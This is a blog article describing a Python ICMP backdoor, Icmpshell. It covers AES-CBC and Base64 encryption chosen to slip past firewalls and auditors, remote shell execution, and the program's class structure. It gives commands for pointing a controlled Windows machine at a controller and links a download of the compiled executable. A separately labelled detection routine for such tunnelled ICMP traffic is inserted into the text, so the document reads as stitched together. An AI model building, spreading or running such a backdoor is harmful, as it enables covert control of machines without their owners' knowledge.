ICMP backdoor
Contents
Article 1: Python3 implementation of the ICMP remote control backdoor (Part 1)
Article 2: Python3 implementation of the ICMP remote control backdoor (Part 1), supplementary article
Article 3: Python3 implementation of the ICMP remote control backdoor (Part 2): the "sniffing" trick
In this final article of the series the "boss" appears: an interesting ICMP backdoor, packaged for now with PyInstaller into Win32 and Win64 versions, as shown in the figure.
Building on the previous articles, this one extends the material with encryption and decryption of the data and with invocation of the shell, and finally produces a usable ICMP backdoor. The article is divided into five sections and takes about 5 minutes to read.
Section 1: Encryption and decryption of the communication
The ICMP remote control communicates over the ICMP protocol. To keep the communication confidential and to stop firewalls or auditors from recognising the control information, the content of the ICMP data field is encrypted.
The method used here combines AES encryption with Base64 encoding. AES is the most common symmetric encryption algorithm (it is also the algorithm used for encrypted transmission in mini programs). A symmetric algorithm encrypts and decrypts with the same key; the specific encryption and decryption process is as follows:
AES is only the basic algorithm; it is used in several modes. CBC mode has become the technical standard because of its security: it is used by TLS (the encryption standard behind HTTPS) and by IPsec (adopted by Windows). Put simply, the scheme derives the key and IV from a password and a salt with a fixed algorithm (MD5), then encrypts the plaintext and decrypts the ciphertext with that key and IV (the initialization vector, which is combined with the first plaintext block before encryption).
The ICMP remote control's encryption and decryption scheme is described below. AES is used in CBC mode; Python 3.5 and earlier use the pycrypto module, later versions use the pycryptodome module.
Encryption
AES encryption is applied first. The length of the content passed in must be a multiple of 16; anything shorter is padded up to a multiple of 16 (here I pad up to a multiple of 32). After AES encryption, the ciphertext is Base64-encoded for transmission.
Decryption
The received content is first Base64-decoded, then AES-decrypted, and finally the padding that was added for alignment is stripped.
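From the defender's side, the scheme above leaves a visible signature: echo payloads that are valid Base64 of 16-byte-aligned ciphertext instead of the fixed ping pattern. The following added example (my own code, not from the article or from Icmpshell) parses ICMP echo packets and flags such payloads; the reference ping patterns and the stand-in ciphertext are constructed for the demonstration.

```python
import base64
import hashlib
import struct

# Payload of a standard Windows ping (constructed reference value).
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"

def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum; returns 0 over a packet whose checksum field is correct."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def build_echo(payload: bytes, ident: int = 1, seq: int = 1, kind: int = 8) -> bytes:
    """Build an ICMP echo request (type 8) or echo reply (type 0) with a valid checksum."""
    header = struct.pack("!BBHHH", kind, 0, 0, ident, seq)
    return struct.pack("!BBHHH", kind, 0, icmp_checksum(header + payload), ident, seq) + payload

def block_aligned_base64(payload: bytes) -> bool:
    """True if the payload is strict Base64 whose decoded length is a multiple of the AES block size."""
    try:
        decoded = base64.b64decode(payload, validate=True)
    except ValueError:
        return False
    return len(decoded) > 0 and len(decoded) % 16 == 0

def inspect_icmp(packet: bytes) -> dict:
    """Classify one ICMP packet (IP header already removed) and list why it looks like tunnelled data."""
    kind, code, _, ident, seq = struct.unpack("!BBHHH", packet[:8])
    payload = packet[8:]
    reasons = []
    if kind in (0, 8):
        # Linux ping: 8-byte timestamp followed by the bytes 0x10..0x3f (56 bytes in total).
        linux_pattern = len(payload) == 56 and payload[8:] == bytes(range(0x10, 0x40))
        if payload != WINDOWS_PING_PAYLOAD and not linux_pattern:
            if len(payload) > 64:
                reasons.append("oversized echo payload (%d bytes)" % len(payload))
            if block_aligned_base64(payload):
                reasons.append("payload is Base64 of AES-block-aligned data")
    return {"type": kind, "code": code, "id": ident, "seq": seq,
            "checksum_ok": icmp_checksum(packet) == 0,
            "suspicious": bool(reasons), "reasons": reasons}

# Constructed samples: a normal Windows ping, and an echo whose data field carries the
# Base64 of 32 pseudo-random bytes standing in for two AES-CBC ciphertext blocks.
BENIGN_PACKET = build_echo(WINDOWS_PING_PAYLOAD)
COVERT_PACKET = build_echo(base64.b64encode(hashlib.sha256(b"constructed sample").digest()))
```

The same checks can be run over echo replies (type 0), since the controlled end answers over ICMP as well.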
Section 2: Calling the shell
The basic function of the ICMP backdoor is to invoke a shell, which is often called bouncing a shell (a reverse shell). The shell that is bounced is the shell of the controlled side: the controller sends a shell command to the controlled side over ICMP, the controlled side invokes its shell to execute the command, and passes the result back to the controller over ICMP. Calling the shell in Python looks like this:
Section 3: Overall structure of the program
There are three classes in the code: the parent class Transfer and the two subclasses Client and Server. The Transfer class implements the common functionality: socket initialisation, encryption and decryption, and construction of ICMP packets. It also declares a reverse method that the subclasses must implement.
Parent class Transfer
Subclass Client
Subclass Server
Section 4: How to use
Take the Icmpshell_win32.exe I generated as an example. For the demonstration a VM was started and placed on a LAN with the host; the VM runs 32-bit Windows 7 and the host runs 64-bit Windows 7. The host's IP is 192.168.72.4 and the VM's IP is 192.168.72.133.
The host acts as the controller and the VM as the controlled end. First run the following command on the host (run as Administrator):
Icmpshell_win32.exe -s 192.168.72.4
The -s parameter specifies the IP of the controller.
Run the following command on the controlled end (run as Administrator):
Icmpshell_win32.exe -l 192.168.72.133 -c 192.168.72.4
The -l parameter specifies the IP of the controlled end; the -c parameter specifies the IP of the controller to connect to.
Result on the controlled end
Result on the controller
Executing the dir and tasklist commands
The whoami command
The Icmpshell source code has been uploaded to Knowledge Planet first; friends who want to see the source code, please follow my Knowledge Planet.
If you just want to play with it, here is the download link for Icmpshell_win32.exe.
https://pan.baidu.com/s/1xQRyxmq6PUw6qHMU9ZKZ4g Password: 8rgu
Finally
If you think this article is worthwhile, remember to recommend it. Please follow my public account; Knowledge Planet is in the menu.
Reply "1": get the Python data analysis tutorial package
Reply "2": get the complete Python Flask tutorial set
Reply "3": get the complete machine learning tutorial
Python3 implementation of the ICMP remote control backdoor (Part 3): the "boss" appears